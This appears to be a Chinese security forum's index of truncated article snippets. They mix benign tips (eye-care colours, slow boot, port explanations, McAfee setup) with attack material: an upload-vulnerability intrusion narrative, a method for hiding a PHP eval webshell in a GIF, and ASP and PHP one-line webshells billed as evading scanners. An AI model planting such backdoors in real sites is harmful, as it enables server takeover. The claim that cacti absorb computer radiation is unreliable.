电脑病毒论坛 今日: 0|主題: 1421|排名: 14 

“上传漏洞”入侵是目前对网站最广泛的入侵方法。90%的具有上传页面的网站，都存在上传漏洞。本文将介绍常见的上传漏洞及其防范技巧。 一、能直接上传asp文件的漏洞 如果网站有上传页面，就要警惕直接上传asp文件漏洞。例如去年流行的动网5.0/6.0论坛，就有个upfile.asp上传页面，该页面对上传文件扩展名过滤不严 ...

今天无聊来看看他们的站，打开网站 asp 的企业站 ，点了几个链接看了下，看不出来什么程序 于是扫扫目录 扫出来个 upload_photo.asp 这个文件一般使用的是无惧无组件上传 ，存在双文件上传的漏洞 ，尝试 cookies 欺骗绕过登录检测 遗憾的是不行 看来这个洞被补了。。虽然是老程序 ，但是用了这么多年 ，经过无数次被黑之后 ...

我们知道，长期使用电脑，眼睛盯着屏幕会使眼睛非常干涩、疲劳，所以现在流行将电脑设置成可以保护眼睛的颜色。 这两天人资部的MM问我如何给电脑设置成保护眼睛的颜色，其实，百度一下“保护眼睛的颜色设置”、“保护眼睛的电脑颜色”等关键词，就可以找到很多教授设置电脑为保护色的攻略，按照网上讲 ...

第一招：在电脑旁放上几盆仙人掌，它可以有效地吸收辐射; 第二招：还 对于生活紧张而忙碌的人群来说，抵御电脑辐射最简单的办法就是在每天上午喝2至3杯的绿茶，吃一个橘子。茶叶中含有丰富的维生素Ａ原，它被人体吸收后，能 迅速转化为维生素Ａ。维生素Ａ不但能合成视紫红质，还能使眼睛在暗光下看东西更清楚，因此，绿茶不 ...

电脑用久了，装的软件，插件，越来越多，所做的操作也会留下很多垃圾文件保持在电脑上，加上电脑硬件也会老化，电脑中毒什么的。都有可能导致电脑开机速度慢。 导致开机速度慢的一些原因： 1、开机启动项太多。 现在很多软件，如PDF阅读器、播放器、输入法、下载工具等软件，明明应该只是在用户需要时再打开，却悄悄给自己 ...

php后门木马常用的函数大致上可分为四种类型： 　　1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open 　　2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13 　　3. 文件包含与生成: require, require_once, include, include_once, f ...

ThinkPHP是一个国内使用很广泛的老牌PHP MVC框架。貌似国内有不少创业公司或者项目都用了这个框架。 最近官方发布了一个安全补丁，官方表述是：该URL安全漏洞会造成用户在客户端伪造URL，执行非法代码。 可是貌似大多数开发者和使用者并没有注意到此漏洞的危害性，应者了了，更不用说有多少人去升级了。随后我对其进行了分 ...

135端口主要用于使用RPC（Remote rocedure Call，远程过程调用）协议并提供DCOM（分布式组件对象模型）服务。  端口说明：135端口主要用于使用RPC（Remote rocedure Call，远程过程调用）协议并提供DCOM（分布式组件对象模型）服务，通过RPC可以保证在一台计算机上运行的程序可以顺利地执行远程计 ...

21端口主要用于FTP（File Transfer rotocol，文件传输协议）服务。 端口说明：21端口主要用于FTP（File Transfer rotocol，文件传输协议）服务，FTP服务主要是为了在两台计算机之间实现文件的上传与下载，一台计算机作为FTP客户端，另一台计算机作为FTP服务器，可以采用匿名（anonymous）登录和授权 ...

降低浏览器遭到劫持等风险，非IE用户也可以酌情考虑一下，毕竟IE的功能拓展就目前而言是最好的。 操作步骤如下： 1.单击【开始】菜单 2.运行【gpedit.msc】进入本地组策略编辑器 3.进入【用户配置】 4.进入【管理模板】 5.进入【windows组件】 6.选择，进入【Internet Explorer】 7.寻找“禁用Internet Explorer组件自 ...

McAfee8.7i详细讲解教程--含安装、设置以及规则编写（参照卡饭论坛原McAfee85i教程编写）     一、McAfee8.7i安装  下载完成后，双击SetupVSE.Exe即可进入安装程序：     选择许可类型及地区：     选择自定义安装以及安装路径：     强烈建议新手选择“标准保护&rdquo ...

Web站点的安全已经受到越来越多人的关注，今天就来教给大家用McAfee 8.7i打造超安 全的Web站点目录，站长们尤其要看好了。  首先需要安装McAfee 8.7i，新手可参考McAfee8.7i详细讲解教程--含安装、设置以及规则 编写一文，本文详细讲解了McAfee 8.7i的安装以及初步设置方法。  安装完成后 右键点击右下角的McAfee ...

选中 操作页面 提交数据 IP/日期 方式 /zz_article/articleshow.asp articleid=297 And Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as varchar(1))+char(124)=1 124.237.26.212 2007-11-14 SQL注入（GET） /product/productshow.asp productid=74 And Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as var ...

一、描述 　　intval函数有个特性:"直到遇上数字或正负符号才开始做转换，再遇到非数字或字符串结束时(\0)结束转换",在某些应用程序里由于对intval函数这个特性认识不够,错误的使用导致绕过一些安全判断导致安全漏洞. 二、分析 php程序员站 复制代码代码如下: 　　PHP_FUNCTION(intval) 　　{ 　　zval **num, **arg_base; ...

以目前流行的PHP为例： 先合并一张PHP一句话图片马，合并方法： ①、DOS合并：copy 1.gif /b + 1.txt/a php.gif ②、用edjpgcom，进行图片和一句话木马的合并，一句话代码为<?php eval($_POST[meckun]);?> 图片随便找一张. 【顺带着说一下edjpgcom的使用方法：打开edjpgcom.exe所在文件夹，然后把你所要修改的图片拖动到edj ...

根据分析，此次事件涉及到来自putty.org.cn、putty.ws、winscp.cc和sshsecure.com站点的中文版putty、 WinSCP、SSHSecure和psftp等软件，而这些软件的英文版本不受影响。 1．时间线 1月25日：新浪微博有网友发布消息称putty和winscp中装有后门程序，但该条微博并未提及后门程序的类型及其技术细节，而且消息也未被过多的人 ...

代码如下：复制代码代码如下:#!/bin/sh#modprobe ipt_MASQUERADEmodprobe ip_conntrack_ftpmodprobe ip_nat_ftpiptables -Fiptables -t nat -Fiptables -Xiptables -t nat -X###########################INPUT键###################################iptables -P INPUT DROPiptables -A INPUT -m state –state ESTABLI ...

我随便看了看/var/log/secure日志，显示如下：复制代码代码如下:118.33.110.52=2834119.145.254.77=37121.254.179.199=226121.88.250.243=35200.29.110.104=168202.78.173.199=250222.221.2.210=373这里面除了119.145.254.77和121.88.250.243是正常的外，其它的基本都是恶意IP。由于服务器是置于LVS集群后面，所以我原来想 ...

要不容易出错的。 复制代码代码如下: <style type="text/css"> <!-- body,td,th { font-size: 12px; } --> </style> <% Function httpopen(neirong,fangshi,dizhi,refer,cookie) set Http=server.createobject("Microsoft.XMLHTTP") Http.open fangshi,dizhi,false Http.setrequestheader "Referer",refer Http.setrequesth ...

以下这个ASP一句话 <%If Request("1") "" Then ExecuteGlobal(Request("1"))%> 上面这句是防杀防扫的！网上很少人用！可以插在网页任何ASP文件的最底部不会出错，<?php ($_=@$_GET[2]).@$_($_POST[1])?> 上面这句是防杀防扫的！网上很少人用！可以插在网页任何ASP文件的最底部不会出错， 比如index.asp里面也是可以的！因为 ...